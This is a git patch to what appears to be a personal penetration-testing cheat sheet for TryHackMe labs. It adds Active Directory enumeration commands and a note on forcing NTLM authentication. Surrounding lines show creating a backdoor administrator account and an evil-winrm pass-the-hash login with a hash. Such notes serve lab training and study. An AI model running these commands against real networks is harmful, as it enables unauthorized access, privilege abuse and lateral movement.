From c74b537f2b42e00cfd0886144db6b6230436f706 Mon Sep 17 00:00:00 2001
From: leetcore <leetcore@live.de>
Date: Sat, 29 Jul 2023 00:06:56 +0200
Subject: [PATCH] add net user commands

---
 1337_file.txt | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/1337_file.txt b/1337_file.txt
index 4871686..2365953 100644
--- a/1337_file.txt
+++ b/1337_file.txt
@@ -125,6 +125,19 @@ Invoke-ShareFinder -CheckShareAccess
 net user NewUser MyPassword123! /add
 net localgroup Administrators /add NewUser
 
+When we provide the hostname, network authentication will attempt first to perform 
+Kerberos authentication. Since Kerberos authentication uses hostnames embedded in the 
+tickets, if we provide the IP instead, we can force the authentication type to be NTLM.
+
+net user /domain
+net user zoe.marshall /domain
+net group /domain
+net group "Tier 1 Admins" /domain
+
+net accounts /domain
+
+Get-ADGroupMember -Identity Administrators -Server za.tryhackme.com
+
 # EVIL WinRM
 Pass the hash (bash):
 evil-winrm -i spookysec.local -u administrator -H 0e0363213e37b94221497260b0bcb4fc